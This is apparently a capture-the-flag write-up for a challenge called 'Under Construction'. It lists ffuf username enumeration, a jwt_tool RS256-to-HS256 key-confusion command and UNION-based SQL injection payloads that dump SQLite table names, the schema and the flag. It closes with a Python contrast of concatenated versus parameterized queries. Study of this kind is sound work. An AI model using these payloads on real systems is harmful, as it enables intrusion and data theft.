Under Construction
ffuf -request req -w ../../usernames.txt -mr exists -u -s
Usernames:
gale
rosie
• Key Confusion [RS256 > HS256]
./jwt_tool.py -t -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
• sqlite_version()
<> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
• table name
-I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
• column names [read them from the CREATE TABLE statement returned in the output]
-I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
• flag
-I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "
-------------------------------------------------
observations:
-------------------------------------------------
• The JWT public key is present in the JWT token
• Usernames can be enumerated
• JWT key confusion is possible because both RS256 and HS256 are accepted
• SQL injection is present in the getUser request because the input is not escaped
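
The last observation, shown as an added example (not the challenge application's code): the same lookup written with string concatenation and with a bound parameter, run against the `sqlite_version()` payload from the notes above. The in-memory database, the three-column `users` table, and the function names are assumptions made for illustration.

```python
import sqlite3

# Payload copied from the notes above.
PAYLOAD = "test123' union select 1,sqlite_version(),3 -- "


def make_db():
    # Constructed in-memory database. The three-column users table is an
    # assumption chosen to match the three-column UNION payloads in the notes.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.execute(
        "INSERT INTO users (username, password) VALUES ('gale', 'constructed-hash')"
    )
    return db


def get_user_concat(db, username):
    # Unescaped pattern: the username is spliced into the SQL text, so a quote
    # in the input closes the string literal and the remainder is parsed as SQL.
    query = "SELECT * FROM users WHERE username = '" + username + "'"
    return db.execute(query).fetchone()


def get_user_bound(db, username):
    # Hardened pattern: the value travels as a bound parameter and is only ever
    # compared as data, whatever characters it contains.
    return db.execute(
        "SELECT * FROM users WHERE username = ?", (username,)
    ).fetchone()


def demo():
    # Run a normal username and the payload through both lookups.
    db = make_db()
    return {
        "concat_normal": get_user_concat(db, "gale"),
        "concat_payload": get_user_concat(db, PAYLOAD),
        "bound_normal": get_user_bound(db, "gale"),
        "bound_payload": get_user_bound(db, PAYLOAD),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:15} {row}")
```

Because the username reaches the query from a JWT claim, binding the parameter closes the injection even if a token with attacker-chosen claims is accepted; restricting verification to a single expected algorithm addresses the key-confusion observation separately.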